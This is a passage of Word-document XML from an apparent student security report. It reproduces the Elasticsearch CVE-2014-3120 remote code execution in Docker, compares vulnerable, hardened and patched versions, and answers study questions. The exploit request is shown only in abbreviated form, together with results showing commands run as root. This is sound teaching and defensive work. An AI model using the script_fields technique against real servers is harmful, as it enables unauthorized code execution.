        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/_search' -d '{... script_fields ...}'</w:t>
        <w:br/>
        <w:t>HTTP/1.1 400   ScriptException[dynamic scripting for [groovy] disabled]</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ docker compose exec -T es cat /tmp/pwned.txt</w:t>
        <w:br/>
        <w:t>cat: /tmp/pwned.txt: No such file or directory     # nothing executed</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s 'http://127.0.0.1:9200/blog/post/_search?q=hello'</w:t>
        <w:br/>
        <w:t>{"hits":{"total":1, ...}}                          # service still works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9.1 The three scenarios, measured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To separate *mitigation* from *patch*, the vulnerable 1.1.1 image was also run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with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script.disable_dynamic: true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, i.e. the code is still 1.1.1 but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capability is switched off.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Scenario (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:b/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>version.number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Attack response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6"/>
              </w:rPr>
              <w:t>/tmp/pwned.txt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Normal search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vulnerable/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.1.1, scripting on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200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pwn: ["java.lang.UNIXProcess@…"]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`uid=0(root)`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hardened/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.1.1 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>script.disable_dynamic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400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dynamic scripting disabled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absent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fixed/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.4.4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400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dynamic scripting for [groovy] disabled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absent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Reading the table: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1 is the vulnerability — the command really ran, as root;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2 is the mitigation alone — same vulnerable code, attack refused, so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fix does not depend on the upgrade being possible;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3 is the patched release — the request dies before any script is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compiled, and the error names the new default engine (Groovy), which shows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server still understands the request but no longer evaluates it.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Automated verdict (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/run_demo.ps1 -Phase all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>):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PHASE 1: Elasticsearch 1.1.1 (dynamic scripting enabled)</w:t>
        <w:br/>
        <w:t>VERDICT: code execution = SUCCESS (vulnerable, as expected)</w:t>
        <w:br/>
        <w:t>VERDICT: normal search = OK</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability reproduced</w:t>
        <w:br/>
        <w:br/>
        <w:t>PHASE 2: Elasticsearch 1.1.1 + script.disable_dynamic</w:t>
        <w:br/>
        <w:t>VERDICT: script rejected = True</w:t>
        <w:br/>
        <w:t>VERDICT: command executed = False</w:t>
        <w:br/>
        <w:t>VERDICT: normal functionality intact = True</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability eliminated</w:t>
        <w:br/>
        <w:br/>
        <w:t>PHASE 3: Elasticsearch 1.4.4 (dynamic scripting off by default)</w:t>
        <w:br/>
        <w:t>VERDICT: script rejected = True</w:t>
        <w:br/>
        <w:t>VERDICT: command executed = False</w:t>
        <w:br/>
        <w:t>VERDICT: normal functionality intact = True</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability eliminated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Raw transcript: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>reports/cve-2014-3120-all.log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fixed environment – attack returns 400, no file created, search still returns 1 hit]]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hardened 1.1.1 – same 400 rejection, site still functional]]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10. Conclusion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work produced (a) a working API whose security properties are enforced in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code *and* pinned by tests, (b) a CI pipeline that fails on a medium SAST finding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or a vulnerable dependency, and (c) a reproducible exploitation-and-fix cycle for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 real CVE.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 most transferable lesson is from part (c): the flaw was not a missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if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Elasticsearch 1.1.1 had a check — the request had to be well-formed JSON — but it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treated *code* as ordinary data, so the check was irrelevant. A capability that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lets a client run code is not something a filter can make safe; it has to be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removed from the reachable surface, or at minimum switched off by default.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same reasoning explains why the upgrade alone is not the whole answer: 1.4.4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fixed this CVE and still fell to a sandbox escape a year later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(CVE-2015-1427), while "no client-supplied scripts" would have prevented both.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Appendix A. Control questions (short answers)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bcrypt vs SHA-256 for passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA-256 is designed to be fast, so a GPU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 try billions of candidates per second. bcrypt is deliberately slow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tunable (cost 12 ≈ 2^12 rounds), and it stores a per-password salt inside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hash, so identical passwords produce different hashes and precomputed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rainbow tables do not apply.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SAST vs DAST.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SAST analyses source code without running it — it sees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every branch, including unreachable code, but produces false positives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cannot see configuration or runtime state. DAST attacks a running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application from outside — it finds real, reachable issues but only covers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what it can reach and gives less precise localisation.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JWT mechanism.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A JWT is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>base64url(header).base64url(payload).signature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payload carries claims (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). The server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verifies the signature with a shared secret (HS256) or public key (RS256)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checks the time-based and issuer claims. The payload is signed, not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encrypted — anyone can read it, so no secrets belong in it.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Risk of not auditing dependencies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Third-party code runs with your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privileges. An unpatched library with a known CVE (Log4Shell,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event-stream incident) gives an attacker code execution or data access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without ever touching your own source. SCA is the only control that catches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this, because SAST looks at *your* code.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Docker/Vulhub vs installing vulnerable software.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Containers are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disposable, isolated and reproducible: no host pollution, no leftover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services, a rollback is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>docker compose down</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, and the exact vulnerable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version is pinned in a file that can be shared with the whole class.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Vulnerability vs exploit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A vulnerability is the flaw itself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(Elasticsearch compiles and evaluates client-supplied scripts with full Java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reflection and no authentication). An exploit is the concrete request that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abuses it (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /_search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script_fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calling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Runtime.getRuntime().exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). In this work the vulnerability is the dangerous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default in the product; the exploit is the curl request.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Why regression testing after a patch.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A patch changes behaviour, and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security fix that disables the feature is not a fix. Here, a perfectly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"secure" answer would be to block the whole service; the regression check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GET /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> still returns 200) proves the legitimate path still works.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Why reproduce CVEs as a specialist.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A pentester needs to know what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working exploit looks like in order to judge whether a target is really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affected, and a SOC analyst needs the same knowledge to recognise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traffic in logs. Reproduction turns a CVE description into a concrete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signature: the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 xml:space="preserve"> pattern in a URL is trivial to grep for once you have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seen it.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